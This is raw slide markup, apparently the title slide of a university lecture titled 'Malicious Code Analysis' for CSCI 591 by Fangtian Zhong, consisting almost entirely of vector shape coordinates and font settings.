                    <a:pt x="9314" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8798" y="1"/>
                    <a:pt x="524" y="4459"/>
                    <a:pt x="524" y="4459"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="524" y="4459"/>
                    <a:pt x="0" y="11793"/>
                    <a:pt x="96" y="12662"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="13520"/>
                    <a:pt x="941" y="15936"/>
                    <a:pt x="941" y="15936"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4287" y="17949"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3441" y="15603"/>
                    <a:pt x="2441" y="7376"/>
                    <a:pt x="6144" y="6102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7364" y="5677"/>
                    <a:pt x="8416" y="5507"/>
                    <a:pt x="9321" y="5507"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11179" y="5507"/>
                    <a:pt x="12415" y="6223"/>
                    <a:pt x="13216" y="6912"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14395" y="7924"/>
                    <a:pt x="13883" y="15817"/>
                    <a:pt x="12919" y="18211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16955" y="15044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17372" y="3887"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17372" y="3887"/>
                    <a:pt x="9537" y="185"/>
                    <a:pt x="9335" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9331" y="3"/>
                    <a:pt x="9324" y="1"/>
                    <a:pt x="9314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Google Shape;109;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1790996" y="1390959"/>
              <a:ext cx="944973" cy="1381073"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="23218" h="33933" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="11514" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10180" y="0"/>
                    <a:pt x="1608" y="5453"/>
                    <a:pt x="786" y="12252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="19050"/>
                    <a:pt x="1786" y="27492"/>
                    <a:pt x="4763" y="33933"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5775" y="33933"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5775" y="33933"/>
                    <a:pt x="4024" y="21324"/>
                    <a:pt x="4477" y="16240"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4882" y="11525"/>
                    <a:pt x="9085" y="10704"/>
                    <a:pt x="11871" y="10704"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14657" y="10704"/>
                    <a:pt x="17764" y="11525"/>
                    <a:pt x="18312" y="15538"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18883" y="19741"/>
                    <a:pt x="16943" y="33576"/>
                    <a:pt x="16943" y="33576"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18967" y="33933"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21277" y="27396"/>
                    <a:pt x="23217" y="17752"/>
                    <a:pt x="22205" y="12156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21134" y="6263"/>
                    <a:pt x="12859" y="0"/>
                    <a:pt x="11514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Google Shape;110;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1301539" y="3226997"/>
              <a:ext cx="1885590" cy="1256083"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="46329" h="30862" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="441" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="1"/>
                    <a:pt x="1" y="191"/>
                    <a:pt x="1" y="441"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="30421"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="30671"/>
                    <a:pt x="203" y="30862"/>
                    <a:pt x="441" y="30862"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45876" y="30862"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="46138" y="30862"/>
                    <a:pt x="46328" y="30671"/>
                    <a:pt x="46328" y="30421"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46328" y="441"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="46328" y="191"/>
                    <a:pt x="46138" y="1"/>
                    <a:pt x="45876" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="D12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Google Shape;111;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1092220" y="3508638"/>
              <a:ext cx="330525" cy="521367"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8121" h="12810" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3652" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2300" y="0"/>
                    <a:pt x="1546" y="755"/>
                    <a:pt x="2001" y="2010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1882" y="2427"/>
                    <a:pt x="286" y="3380"/>
                    <a:pt x="1310" y="4404"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1191" y="4701"/>
                    <a:pt x="0" y="5225"/>
                    <a:pt x="893" y="7035"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="8095"/>
                    <a:pt x="691" y="8976"/>
                    <a:pt x="1691" y="9749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2120" y="10071"/>
                    <a:pt x="2501" y="10952"/>
                    <a:pt x="3679" y="11952"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4287" y="12476"/>
                    <a:pt x="5144" y="12809"/>
                    <a:pt x="5144" y="12809"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5120" y="8785"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6489" y="8726"/>
                    <a:pt x="7299" y="8404"/>
                    <a:pt x="7501" y="7630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7501" y="6928"/>
                    <a:pt x="5703" y="6975"/>
                    <a:pt x="5739" y="6904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6192" y="6785"/>
                    <a:pt x="7561" y="6975"/>
                    <a:pt x="7906" y="5785"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8120" y="4916"/>
                    <a:pt x="6037" y="4749"/>
                    <a:pt x="5263" y="4701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5261" y="4696"/>
                    <a:pt x="5270" y="4694"/>
                    <a:pt x="5290" y="4694"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5391" y="4694"/>
                    <a:pt x="5768" y="4752"/>
                    <a:pt x="6197" y="4752"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6667" y="4752"/>
                    <a:pt x="7199" y="4683"/>
                    <a:pt x="7501" y="4392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7918" y="3999"/>
                    <a:pt x="7906" y="3451"/>
                    <a:pt x="7608" y="3106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7311" y="2772"/>
                    <a:pt x="5322" y="2332"/>
                    <a:pt x="5287" y="2272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5600" y="2272"/>
                    <a:pt x="5914" y="2323"/>
                    <a:pt x="6163" y="2323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6367" y="2323"/>
                    <a:pt x="6528" y="2289"/>
                    <a:pt x="6608" y="2165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7251" y="1237"/>
                    <a:pt x="6037" y="498"/>
                    <a:pt x="5061" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4546" y="73"/>
                    <a:pt x="4071" y="0"/>
                    <a:pt x="365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Google Shape;112;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1215296" y="3585520"/>
              <a:ext cx="92104" cy="15629"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2263" h="384" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="146" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="1"/>
                    <a:pt x="1" y="2"/>
                    <a:pt x="1" y="2"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2263" y="383"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1737" y="33"/>
                    <a:pt x="557" y="1"/>
                    <a:pt x="1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Google Shape;113;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1192993" y="3686821"/>
              <a:ext cx="138665" cy="15100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3407" h="371" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="225" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="0"/>
                    <a:pt x="1" y="2"/>
                    <a:pt x="1" y="2"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3406" y="371"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2582" y="32"/>
                    <a:pt x="844" y="0"/>
                    <a:pt x="2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Google Shape;114;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1178951" y="3781610"/>
              <a:ext cx="146886" cy="8018"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3609" h="197" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1526" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="994" y="0"/>
                    <a:pt x="447" y="47"/>
                    <a:pt x="1" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3608" y="197"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3608" y="189"/>
                    <a:pt x="2598" y="0"/>
                    <a:pt x="15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Google Shape;115;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1164910" y="3863742"/>
              <a:ext cx="135734" cy="15873"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3335" h="390" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1"/>
                    <a:pt x="1606" y="389"/>
                    <a:pt x="3007" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3118" y="389"/>
                    <a:pt x="3227" y="387"/>
                    <a:pt x="3334" y="382"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3334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Google Shape;116;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2600721" y="4533413"/>
              <a:ext cx="364428" cy="137485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8954" h="3378" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="485" y="1874"/>
                    <a:pt x="2565" y="3377"/>
                    <a:pt x="4873" y="3377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6249" y="3377"/>
                    <a:pt x="7705" y="2844"/>
                    <a:pt x="8954" y="1537"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7644" y="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Google Shape;117;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2649683" y="4533413"/>
              <a:ext cx="474928" cy="92877"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11669" h="2282" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1"/>
                    <a:pt x="429" y="1084"/>
                    <a:pt x="1834" y="1287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1834" y="1287"/>
                    <a:pt x="2152" y="2282"/>
                    <a:pt x="5073" y="2282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5299" y="2282"/>
                    <a:pt x="5540" y="2276"/>
                    <a:pt x="5798" y="2263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7549" y="2180"/>
                    <a:pt x="7977" y="2096"/>
                    <a:pt x="9180" y="1442"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11668" y="1132"/>
                    <a:pt x="11001" y="1"/>
                    <a:pt x="1100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Google Shape;118;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2043946" y="2952235"/>
              <a:ext cx="11640" cy="45625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="286" h="1121" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="286" y="1120"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1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Google Shape;119;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1964459" y="3547873"/>
              <a:ext cx="589784" cy="661416"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="14491" h="16251" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7267" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7222" y="0"/>
                    <a:pt x="7177" y="12"/>
                    <a:pt x="7132" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4947" y="1375"/>
                    <a:pt x="2774" y="1583"/>
                    <a:pt x="1592" y="1583"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1557" y="1583"/>
                    <a:pt x="1522" y="1583"/>
                    <a:pt x="1489" y="1582"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="894" y="1558"/>
                    <a:pt x="524" y="1499"/>
                    <a:pt x="524" y="1499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="1496"/>
                    <a:pt x="491" y="1495"/>
                    <a:pt x="474" y="1495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="420" y="1495"/>
                    <a:pt x="368" y="1510"/>
                    <a:pt x="322" y="1546"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="263" y="1594"/>
                    <a:pt x="227" y="1666"/>
                    <a:pt x="227" y="1725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="1773"/>
                    <a:pt x="1" y="6535"/>
                    <a:pt x="2680" y="11417"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3513" y="12953"/>
                    <a:pt x="4846" y="14429"/>
                    <a:pt x="6942" y="16191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6990" y="16239"/>
                    <a:pt x="7049" y="16251"/>
                    <a:pt x="7109" y="16251"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7168" y="16251"/>
                    <a:pt x="7204" y="16239"/>
                    <a:pt x="7263" y="16191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9276" y="14679"/>
                    <a:pt x="10692" y="13203"/>
                    <a:pt x="11585" y="11702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14431" y="6940"/>
                    <a:pt x="14491" y="2058"/>
                    <a:pt x="14491" y="1999"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14491" y="1927"/>
                    <a:pt x="14455" y="1844"/>
                    <a:pt x="14395" y="1808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14349" y="1771"/>
                    <a:pt x="14302" y="1741"/>
                    <a:pt x="14250" y="1741"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14236" y="1741"/>
                    <a:pt x="14220" y="1744"/>
                    <a:pt x="14205" y="1749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14205" y="1749"/>
                    <a:pt x="13776" y="1785"/>
                    <a:pt x="13121" y="1785"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11871" y="1773"/>
                    <a:pt x="9454" y="1511"/>
                    <a:pt x="7418" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7368" y="15"/>
                    <a:pt x="7318" y="0"/>
                    <a:pt x="7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Google Shape;120;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2223718" y="3729027"/>
              <a:ext cx="79528" cy="306797"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1954" h="7538" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="120" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="477" y="4799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1548" y="4799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1905" y="1"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1001" y="5585"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="453" y="5585"/>
                    <a:pt x="0" y="6025"/>
                    <a:pt x="0" y="6537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="7078"/>
                    <a:pt x="430" y="7537"/>
                    <a:pt x="980" y="7537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="987" y="7537"/>
                    <a:pt x="994" y="7537"/>
                    <a:pt x="1001" y="7537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1524" y="7537"/>
                    <a:pt x="1953" y="7085"/>
                    <a:pt x="1953" y="6537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1953" y="6025"/>
                    <a:pt x="1524" y="5585"/>
                    <a:pt x="1001" y="5585"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="D12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Google Shape;121;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2632711" y="2657611"/>
              <a:ext cx="401750" cy="366422"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9871" h="9003" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7620" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="6382" y="1"/>
                    <a:pt x="5394" y="1001"/>
                    <a:pt x="5394" y="2227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5394" y="2739"/>
                    <a:pt x="5572" y="3216"/>
                    <a:pt x="5846" y="3585"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2334" y="6621"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2084" y="6383"/>
                    <a:pt x="1762" y="6228"/>
                    <a:pt x="1381" y="6228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="631" y="6228"/>
                    <a:pt x="0" y="6859"/>
                    <a:pt x="0" y="7621"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="8371"/>
                    <a:pt x="631" y="9002"/>
                    <a:pt x="1381" y="9002"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2143" y="9002"/>
                    <a:pt x="2774" y="8371"/>
                    <a:pt x="2774" y="7621"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2774" y="7323"/>
                    <a:pt x="2667" y="7038"/>
                    <a:pt x="2513" y="6811"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6025" y="3775"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6430" y="4192"/>
                    <a:pt x="7001" y="4466"/>
                    <a:pt x="7632" y="4466"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8870" y="4466"/>
                    <a:pt x="9871" y="3466"/>
                    <a:pt x="9871" y="2227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9835" y="1001"/>
                    <a:pt x="8847" y="1"/>
                    <a:pt x="76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Google Shape;122;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2264418" y="4879399"/>
              <a:ext cx="914936" cy="109564"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="22480" h="2692" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="2692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22480" y="2692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Google Shape;123;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2434014" y="5036907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Google Shape;124;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2434014" y="5126079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Google Shape;125;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2689895" y="5214764"/>
              <a:ext cx="489947" cy="54782"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1203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2037" y="1345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Google Shape;126;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2894859" y="2508365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7" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="524" y="1"/>
                    <a:pt x="1" y="525"/>
                    <a:pt x="1" y="1168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1811"/>
                    <a:pt x="524" y="2323"/>
                    <a:pt x="1167" y="2323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1810" y="2323"/>
                    <a:pt x="2322" y="1811"/>
                    <a:pt x="2322" y="1168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2322" y="525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Google Shape;127;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1006072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Google Shape;128;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-70566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Google Shape;129;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-40521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Google Shape;130;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-105261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Google Shape;131;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="195186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Google Shape;132;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="495633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Google Shape;133;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="792702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3" name="矩形 172"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9970770" y="109855"/>
            <a:ext cx="196024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2023.10.03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571" y="6016506"/>
            <a:ext cx="247650" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;54;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2731135" y="1773555"/>
            <a:ext cx="6729730" cy="20980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charset="0"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Malicious Code Analysis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charset="0"/>
              <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:sym typeface="Arial" panose="020B0604020202020204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9085" y="109855"/>
            <a:ext cx="1848142" cy="12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Google Shape;55;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4536123" y="4035425"/>
            <a:ext cx="3119755" cy="74993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kumimoji="0" lang="en-US" altLang="en-GB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cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Fangtian Zhong</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-GB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cs typeface="Palatino Linotype" panose="02040502050505030304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kumimoji="0" lang="en-US" altLang="en-GB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cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>CSCI 591</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-GB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cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
